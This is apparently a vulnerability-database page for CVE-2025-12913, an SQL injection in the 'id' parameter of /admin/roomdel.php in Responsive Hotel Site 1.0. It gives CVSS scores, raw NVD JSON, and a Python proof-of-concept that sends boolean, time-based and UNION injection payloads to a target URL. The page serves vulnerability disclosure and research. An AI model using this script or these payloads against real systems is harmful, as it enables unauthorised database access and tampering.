Security Vulnerability Report
中文
CVE-2025-12913 CVSS 4.7 MEDIUM

CVE-2025-12913

Published: 2025-11-08 20:15:35
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A flaw has been found in code-projects Responsive Hotel Site 1.0. This affects an unknown part of the file /admin/roomdel.php. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Responsive Hotel Site 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12913 SQL Injection PoC for Responsive Hotel Site 1.0 # Target: /admin/roomdel.php # Vulnerability: SQL Injection via 'id' parameter import requests import sys def exploit_sql_injection(target_url, cookie=None): """ SQL Injection PoC for CVE-2025-12913 Demonstrates blind SQL injection on id parameter """ # Normal request (should succeed if valid id) normal_payload = "1" # Boolean-based blind SQL injection # Extract database version using substring exploit_payload = "1' AND 1=1 -- " headers = { 'User-Agent': 'Mozilla/5.0', 'Accept': 'text/html' } if cookie: headers['Cookie'] = cookie # Test with normal ID normal_url = f"{target_url}/admin/roomdel.php?id={normal_payload}" response1 = requests.get(normal_url, headers=headers) # Test with SQL injection payload exploit_url = f"{target_url}/admin/roomdel.php?id={exploit_payload}" response2 = requests.get(exploit_url, headers=headers) # Time-based blind SQL injection example time_payload = "1' AND SLEEP(5) -- " time_url = f"{target_url}/admin/roomdel.php?id={time_payload}" print(f"[*] Target: {target_url}") print(f"[*] Testing normal request: {normal_url}") print(f"[*] Status: {response1.status_code}") print(f"[*] Testing injection: {exploit_url}") print(f"[*] Status: {response2.status_code}") # Union-based injection to extract data union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8 -- " union_url = f"{target_url}/admin/roomdel.php?id={union_payload}" response3 = requests.get(union_url, headers=headers) print(f"[*] Testing union injection: {union_url}") print(f"[*] Status: {response3.status_code}") return { 'normal_status': response1.status_code, 'injection_status': response2.status_code, 'union_status': response3.status_code } if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12913-poc.py <target_url>") print("Example: python cve-2025-12913-poc.py http://localhost/hotel") sys.exit(1) target = sys.argv[1] exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12913", "sourceIdentifier": "[email protected]", "published": "2025-11-08T20:15:34.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Responsive Hotel Site 1.0. This affects an unknown part of the file /admin/roomdel.php. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEEBA52B-991B-4FF9-AE6A-14E21F1F7E50"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/HoyaAm/cve-hoya/blob/main/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331631", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331631", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.681061", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.